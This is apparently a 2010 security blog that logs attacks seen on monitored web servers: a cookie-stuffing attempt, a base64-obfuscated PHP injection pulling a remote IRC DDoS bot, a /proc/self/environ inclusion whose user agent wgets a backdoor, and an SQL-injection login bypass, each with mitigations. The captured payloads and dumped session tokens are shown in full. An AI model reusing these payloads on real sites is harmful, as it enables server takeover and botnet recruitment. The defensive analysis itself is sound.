Sunday, September 19, 2010

Hoping for the Best

Event Details


Date

19 September 2010



COOKIE Values
NameValue
ASPSESSIONIDSCRTBQQCJGNLBCPCKBOMMKEIJFCJMPFM
CFID22383750
CFTOKEN51721005
CFGLOBALSurltoken=CFID#=22383750&CFTOKEN#=51721005#lastvisit= {ts \'2010-09-19 16:18:43\'}#timecreated={ts \'2010-09-19 16:18:43\'}#hitcount= 2#cftoken=51729001#cfid=21383760#
X-Mapping-didaedeaEB0B1083BAF4C099C589235951FDADBB
X-Mapping-caklakng4A5C5709EC4B181DC062F79B5B21E09C
_icl_current_languagees
PHPSESSID1c1c463d4ad1c2a798e26c1af3ba3da2
X-Mapping-edafcnem579465E39B484F85E6231FC9E6D1E138
BALANCEDIDbalancer.www281
_netadventist3_session6e30595e8493a9f11a50303c6f8b3c4f
27120c955796957883def31ab14a052b4d9bc3bfa241ef361cf628884
wordpress_test_cookieWP Cookie check
ASPSESSIONIDSACDTSDANHMLENACFGBEHMCABMDHKDKE
fcfcVal
parkinglot1
JSESSIONID1qutet5rna2pq
LB1924488576.20180.0000
qtrans_cookie_testqTranslate Cookie Test
tmgioctTfNxDct6ErNB31xoEqZceoIc
sid_1_1a7703732a7afa22fe260a067c65c7990
BIGipServerbit-inet-http-linux37803466.20481.0000
SessionIDdb3a7c81-3741-4f9a-a900-5d97ce333560
VisitorID2a3dd61e-1bf6-42ea-a399-d4d2ad86f40c&Exp
googleTokenZGMGKDOD2McKEwie0O3aiZSkAhUOIIcKHUYYesgYAyAAMPj7ggE4DVD4- 4IBUKT5mA9Q9vKxEVDU6IQbUIq23B5Q8dqtKQ
pixelstats_visitor_id67331fee75245061388da3fd9e77df72
d528690ac3f32d512b24a755b7ccecde84ae7c9a42e3810d5cfa413
SESSfb1d8525d94d660bc8f929hscilkep1adt9of1agj8tum54
BX868p31969ciuf&b
SERVERIDweb1-2
tu061b31ae4fe862878a7595117ae8416a
X-Mapping-nbjnphkm8DA8508445391E23666146AE567F08EC
Apache95.65.x.x.835171294912545338
X-Mapping-kjicghkcC960851A671102A97B52FDBF75C01665
b91c4587747e94d96ce5d3fbcab89b0ce5f389779ded811f402d4c
CFCV_MERCHANTLASTVISITTIME{ts \'2010-09-19 09:26:05\'}
X-Mapping-beedigeg5E30EDBC3F2176516FE6669D5F48B32E
wordpress_d76e66a54228b4|1286123411|bbff8436665d6b302d1c6abeeab7bc04
wordpress_logged_in_d76e66a54228|1286123411|d68e34164b9b1a0b21f92baef42e9d84
ASPSESSIONIDQAAADCBSOHCHFJADOJKJCBFEOPFKALCN
wikidot_token771ad16ad2c4d81f328082ff6c4b20768
VSESSID1359648.dca700188a89324e44f3e81bf58d4aa6
VISITID6e193f4b3162a051fece049be7fac04b
COMMUNITY_ID1359658.b2219323397be5f626b3c2c0100ea84b
languageen
TRIBE_NETb
ljuniqgl3ocO74evXTwzM:1284914251:pgstats0:m0
bncom95.65.xx.xx.241961284920569217
BNSc1d60fa2c29235f0abc24034ff19d470
lot1285519205
USER_COUNTRYRO
USERNAMEdeleted
UPdeleted
IPSETdeleted
lastpagedevilsinferno
GEOIP_COUNTRY_CODEMD
ARPTJIUJWUS10.201.6.104CKMKM
Coyote-2-d81ebee0d8c54a52:0
golfczech_sessionnh4l85bhnp5tqp22cv51if8677
TS5d4ca4c388a426083b9296b647cf490399f55d0533d6b8bac9704a4c963e62
cl_b1284915225980101709
appletvsource_com8nf7q9lp2a84a9kr1dkeih96n0
xn_visitorb74a0c19-a529-45f5-1d6f-17697f716573
ning_sessionl8UkOxI3LABk5Kk9GbCk/Iai2V31f0zebfJS4Yg/NOj3EBhXV 4sA7KUbx66EgnL19vQa9yn/Gg
SESS19be68902958250fb1aabe273a8e37c60088cgm6ucm52otu62d6etgbd2
ASP_NET_SessionId50ygrp45hg5a4kzrpdchrkzs
rl-sticky-keyc0a8005251
Geo{\"city\":\"Chisinau\",\"country\":\"MD\",\"lat\":\"47.005600\",\"lon\":\"28.857500\"}
datr1284915781-d92ab9c6f7bd8e6cd366b4ef22e66fd8be1efcddae1128b43a3c9
BIGipServerbensbargains_POOL2447708342.20481.0000
visnSB7MgX1MM3gmaBD6yVGB9uAuruCbkxsMqGcSOqIZN/RVjnHdGoGbcji55I6PBcYFOid/nH7RyzLbIi2XIO 5 HTD3XNFjIdauVbD/QYFjaEwvPUxhyNkWIT4yGIF6Sg
X-Mapping-eacdndmjE0173EA196311D523CD792DA546E7F1F
pen14
f4c2dbffe8b9bb602e4145d5dd5ad48c-
exp_last_visit1284913845
exp_last_activity1284944714
ee_language_irish
mvp_session088f0cdeec0dd1ba6a45311d6257139d
wp_ozh_wsa_visits1
wp_ozh_wsa_visit_lasttime1284917831
X-Mapping-hmaddpemB1B24346D692009D6D05252779F5C8AB
abtesta
ASPSESSIONIDSQSBRQDCCPNGANLCHIBBJADLMJNDAAAF
h09392d5de016c2eba5d5e66f5d2581bc
protected11
zf_5y_visitor-A6un8UwaiKZgFNt38zCsl9BSoIAAAAAZlJq5yMN51sz
Coyote-2-b869c4c1b869c41c:0
session_id\"ce49065f87912cb219f96566910f4e84f0898974::95.65.74.130\"
X-Mapping-jhoibjei04BDBCMEE22CBB3BFFC49AA4445AF849
dublbom_com51a4784b26b5ef6c87a4a563ea3779d1
_zsessBAh7BjoPc1Vzc2lvbl9pZCIlMjhjYzRlMjMwOTRjOGQ2MWRhMzU0NzU=-- a84415741b6bb513ed083488ec51
cwebJONQJVSxx.x.xxx.xxxCKMKY
SESSc9b1f25375c7119f0d5b1d92de2dfbaa487e7e7dd4ac0246fa9m962295783dca
simtel_cookie302987322.261.0000
_redmine_sessionBAh7BjbPc2Vzc2lvbl9pZCIlY2EyYzk3NWQ4N=-- ae98617c73721ef0c5c3ff359f67f75c3a5


SERVER Values

HTTP_USER_AGENT: Opera/9.51 (Windows NT 5.1; U; en)



What the hacker was hoping for

Looking at this, it seems quite apparent that the attack was attempting to access restricted parts of the site (or access 3rd party software on your site) by throwing every authentication sessions he can think of at the website.
From Wordpress (Blogging Software) to x-mapping (Process Mapping) to ning (Social Network) to wikidot (Social Media).



The attacker is hoping that you will be running one of the various softwares that he is catering for and that his cookie exploit will be successful.



Alternatively he might be running a spam bot and hopes that the sessions will allow him access to the comment sections of various blogs and social platforms so he can comment spam.



How to prevent this

  • Ensure that your 3rd party software is always up to date
    • Register for the release mailing list
    • Check regularly on the site



What we know about the visitor
This is only from one IP address (originating from Moldova, EU) and the cookie pattern should make for an interesting breakdown. Some of them might even be valid authentication cookies for 3rd party media sites.

Threat Level
Low

Course of Action
If this has happened to you, do the following:

  • Check and remove unautherized 3rd party user accounts
  • Update your 3rd party software

Tuesday, September 14, 2010

The Cold Fusion Request

Event Details


Date
14 September 2010

POST Values
CFID:
xxxxxxxx, CFTOKEN=xxxxxxxx, CFGLOBALS=urltoken=CFID#=xxxxxxx&CFTOKEN#=xxxxxxx#lastvisit={ts '2010-09-14 14:33:18'}#timecreated={ts '2010-09-14 14:33:18'}#hitcount=2#cftoken=xxxxxxxx#cfid=xxxxxxxx#, __mmsid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, __mmuid=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx, __mmtrk=0|||x|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

What the hacker was hoping for

This isn't actually a hack attempt. What this is is cold fusion's horrible built in session handler. It will crop up occasionally in your logs. Sometimes they are forged, sometimes not. However if you're not running Cold Fusion (which you shouldn't be), you should be safe.

How to prevent this


  • Don't run Cold Fusion

Friday, July 9, 2010

The IRC Bot

Event Details


Date
9 July 2010

POST Values
author_name:
[php]echo(base64_decode("ZU5kQQ==").php_uname().base64_decode("ZU5kQQ=="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));include(base64_decode("aHR0cDovL3BsYW5ldHdvcmt0ZWFtLmZpbGVhdmUuY29tL2Rkb3MudHh0Pz8="));;die();[/php]

SERVER Values
HTTP_USER_AGENT: Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)

What the hacker was hoping for

This is an interesting one as it seems that the hacker is trying to perform some type of BBCode injection and hope that the library that performs the BBCode formatting will translate and execute the php code enclosed by [php].

The php would then decode those encoded strings and execute something that looked a little like this:

[php]echo "eNdA" . php_uname() ."eNdA";
include("http://planetworkteam.fileave.com/ddos.txt??");
include("http://planetworkteam.fileave.com/ddos.txt??");; die();[/php]


The included remote files would then start up an IRC bot and connect to a remote IRC server where it would wait for commands from a controller. The list of commands this bot can perfom are as followed:

.user //login to the bot
.logout //logout of the bot
.die //kill the bot
.restart //restart the bot
.mail //send an email
.dns //dns lookup
.download //download a file
.exec // uses exec() //execute a command
.sexec // uses shell_exec() //execute a command
.cmd // uses popen() //execute a command
.info //get system information
.php // uses eval() //execute php code
.tcpflood //tcpflood attack
.udpflood //udpflood attack
.raw //raw IRC command
.rndnick //change nickname
.pscan //port scan
.safe // test safe_mode (dvl)
.inbox // test inbox (dvl)
.conback // conect back (dvl)
.uname // return shell's uname using a php function (dvl)


The source code also contains an encoded Perl script used to connect and download data from a remote location and spawn bash shells (called "Data Cha0s Connect Back Backdoor").

How to prevent this


  • Sanitize your inputs

  • Properly configure any 3rd party libraries.
    • If a 3rd party library allows users to execute arbitrary code then you're asking for trouble.




What we know about the visitor
These attacks have come from numerous IP addresses (most likely compromised machines), so it won't help us identify the hacker.

Attacking Ips:
24.120.145.188
38.117.65.242
41.78.28.104
62.12.136.135
62.44.82.118
62.44.123.3
64.34.170.92
64.89.247.4
64.156.24.220
65.183.182.51
66.76.26.88
66.98.216.16
66.135.41.16
66.230.225.82
67.148.93.62
67.222.22.44
69.70.153.210
69.73.155.53
69.197.157.190
72.1.114.141
72.55.156.70
72.55.165.45
74.206.118.177
75.125.43.162
80.172.236.56
80.177.1.221
81.2.252.33
81.93.192.2
81.93.240.71
81.169.129.100
83.96.231.105
83.143.81.42
84.21.8.208
84.255.193.115
85.19.150.100
87.238.162.10
88.84.142.223
89.32.43.251
89.33.78.92
89.200.169.131
91.121.79.138
91.121.175.184
93.186.192.124
93.190.48.203
94.23.205.159
94.143.220.3
95.168.196.66
98.108.68.50
99.7.55.150
109.86.145.204
114.108.151.149
119.235.18.12
157.181.172.226
157.181.239.239
173.55.123.62
187.45.193.227
188.241.116.138
189.59.8.29
190.95.200.114
192.154.46.38
193.226.30.130
193.246.108.253
194.50.101.248
195.5.163.206
195.199.40.194
195.216.196.122
195.228.86.27
196.41.123.167
199.184.237.35
200.201.180.130
201.116.197.150
202.75.36.10
203.147.62.92
204.15.37.220
204.122.16.64
206.123.118.132
207.218.209.178
208.79.205.56
208.101.48.50
209.85.52.140
209.126.254.119
210.0.213.83
211.206.120.196
211.210.38.8
212.59.6.16
212.61.10.82
212.159.7.202
213.163.84.4
213.165.85.241
213.199.192.18
213.232.94.135
217.64.195.236
217.112.42.77
217.112.84.13
218.38.34.19
219.94.129.49


We can see the HTTP_USER_AGENT is rather unique and can be used to identify visits from the hackers scripts.





BrowserNetscape 4.7
OSSolaris
Languageru (Russian)


The source code of the IRC bot contains comments both in English and Portuguese. By the looks of it, the code was originally written by an English speaker and later adapted (based on variable names, location of comments, etc) by the Portuguese speaker.

What we do know is where this hacker and his bots hang out (IRC server and channels are listed in the source code).

Threat Level
Medium

Course of Action
If this has happened to you, do the following:


  • Take the server offline (if possible)

  • Check active process list for unknown scripts and kill them

  • Fix or remove the vulnerable library

  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.

  • If you don't use it yourself, block both inbound and outbound access to port 6667 (default IRC port)

Friday, June 25, 2010

The proc/self/environ Injection

Event Details


Date
21 June 2010

POST Values
file: ../../proc/self/environ

SERVER Values
HTTP_USER_AGENT: <? exec(\"wget http://[remotescript].txt -O backdoor.php\"); ?>
This is a simplified version of what was captured in the user agent field.

What the hacker was hoping for
What we have hear is a local file injection attack coupled with injected PHP code.

The visitor hopes that my code that handles file inclusion is written something like this:
<?php
// Include file requested
include($_GET['file']);
?>


Thus the file that will be included would be:

/var/www/../../proc/self/environ (which equates to /proc/self/environ)

The hacker is attempting to include the proc details about the current Apache thread. /proc/ contains information about all the running threads, /proc/self/ contains the current thread being run). Apache stores various values in the /proc/self/environ (environment variables) such as the visitors IP address, user agent, script called and other values like this:


DOCUMENT_ROOT=/var/www GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID= HTTP_HOST=www.example.com HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) PATH=/bin:/usr/bin QUERY_STRING= REMOTE_ADDR=x.x.x.x REMOTE_PORT=xxxx REQUEST_METHOD=GET REQUEST_URI=/index.php SCRIPT_FILENAME=/var/www/index.php SCRIPT_NAME=/index.php SERVER_ADDR=x.x.x.x SERVER_ADMIN=webmaster@example.com SERVER_NAME=www.example.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SIGNATURE=
Apache/2.0 (Unix)


However, since the hacker has set his own custom User-Agent (HTTP_USER_AGENT), that will be included and executed as PHP code. The PHP code would then execute shell commands to retrieve a remote script, download it to the server and place it in the website folder:

<?
// Fetch remote script and place in /tmp/dump
exec("wget http://[remotescript].txt -O backdoor.php");
>


Now the hacker can now visit his page and run any commands he wants on your webserver.

http://www.example.com/backdoor.php

How to prevent this

  • Sanitize your inputs
    • Ensure that directory traversal is disabled/checked for
    • Work with an allowed list of files

      $allowed_files = array('file1.php', 'file2.php');
      $allowed_index = array_search($_GET['file'], $allowed_files)
      if ($allowed_index !== NULL)
      {
      include $allowed_files[$allowed_index];
      }


    • Don't allow visitors to specify by name

      $allowed_files = array('file1' => 'file1.php', 'file2' => 'file2.php');
      if (!empty($allowed_files[$_GET['file']]))
      {
      include $allowed_files[$_GET['file']];
      }



Threat Level
High

Course of Action

If this has happened to you, do the following:
  • Take the server offline (if possible)
  • Check active process list for unknown scripts and kill them
  • Patch/Fix the file inclusion vulnerability (update your web application with the latest version)
  • Check your httpd/apache logs (located in either /var/log/httpd/ or /var/log/apache/ folders) for visits from the hacker to determine his IP address(es) and pinpoint which scripts he was hitting (to identify backdoors)
  • Remove backdoor scripts
  • Monitor you logs. The hacker will probably return and attempt to reinfect your server.

Thursday, June 24, 2010

The Common Probing

Event Details

Date
22 June 2010

POST Values
username: ' OR 1='1
password: ' OR 1='1

What we have here is a classic probe to determine if the login form is vulnerable to SQL injection or bypassing.

What the visitor was hoping for
The visitor was hoping that I am not sanitizing my inputs and thus when my SQL query is built it will allow him to bypass the login.

Example:
SELECT * FROM user WHERE username='[x]' AND password='[y]' LIMIT 1
Would become:
SELECT * FROM user WHERE username='' OR 1='1' AND password='' OR 1='1' LIMIT 1
This hopefully would allow him to log in as the first row in the user table.

How to prevent this
  • Sanitize your inputs (type-cast your numerics were possible)
  • Prepare your queries

If you are unsure on how to do this, I recommend reading up on SQL Injections Attacks.

What we know about the visitor
Any visit to your website will always provide you with a wealth of information about the visitor. By simply examining the IP address and the HTTP headers passed, we can normally determine a lot about the visitor.

Firstly we make a quick trip to a whois lookup tool and we find that the IP address belonged to the block assigned to Saudi Arabia (109.82.40.0 - 109.83.255.255). We now can make an educated guess where our visitor is located.

If you want something a bit more accurate, you can look at geoip location services such as MaxMind.

Now we'll dig through the HTTP headers.

HTTP_ACCEPT_LANGUAGE
This will let us know what is the preferred language of the visitor. In this case the preferred language is ar-SA. A quick lookup on a language code chart shows us that that denotes Arabic (Saudi Arabia).

HTTP_USER_AGENT
The HTTP_USER_AGENT header can provide us with more information that just what browser the person is using.

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; AskTbGOM2/5.7.0.231)

A quick visit to http://user-agent-string.info will give us a breakdown of the user agent string.

Browser Internet Explorer 8.0
OS Windows 7
Installed .NET Versions 2.0.50727, 3.5.30729, 3.0.30729
Office Suite Probably (Infopath v.2 MS Office Component installed)

HTTP_X_BLUECOAT_VIA
The visitor is going through a Bluecoat proxy. The value passed in this field is the proxy session for the visitor.

REMOTE_ADDR
This is often the IP address of the visitor. In this case it is the IP address of the Bluecoat proxy.

Threat level

Low

Course of Action

Add weight to visitors from Bluecoat proxies

(When I refer to weight, I'm talking about the weighting that is assigned to a request that determines whether the request is a hostile action and whether it should be blocked or reported).

Introduction

Welcome to Web Security Log. This blog will be dedicated to the listing of incoming attacks on various servers I monitor. I'll endever to explain each attack, what the attacker is hoping to achieve and ways to protect yourself against these attacks.